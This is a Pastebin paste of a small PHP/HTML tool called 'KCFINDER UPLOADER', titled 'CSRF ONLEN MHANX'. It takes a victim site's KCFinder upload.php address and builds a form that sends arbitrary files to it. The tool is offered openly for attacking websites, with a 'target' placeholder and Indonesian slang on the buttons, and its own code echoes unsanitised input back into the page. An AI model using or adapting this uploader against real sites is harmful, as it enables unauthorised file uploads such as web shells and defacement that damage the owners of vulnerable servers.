Advertisement
MrBlank007

KCFINDER UPLOADER

May 19th, 2017
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. <html>
  2. <title>CSRF ONLEN MHANX</title>
  3. <style type="text/css">
  4. html {
  5. width:100%;
  6. height:100%;
  7. background: url('http://wallpapercave.com/wp/8D7ACgs.jpg') center center no-repeat;
  8. background-color: #303030;
  9. }
  10. </style>
  11. <span style='color:white;'>
  12. <td align=center>
  13. <font color="red">KCFINDER UPLOADER</font>
  14. <form method="post">
  15. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  16. <input type="submit" name="d" value="Kunci Target!!!">
  17. </form>
  18. <?php
  19. $url = $_POST['url'];
  20. $d = $_POST['d'];
  21. if($d) {
  22. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='Filedata'><input type='submit' name='g' value='Upload Cok!'></form";
  23. }
  24. ?>
  25. </form>
  26. </span>
  27. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement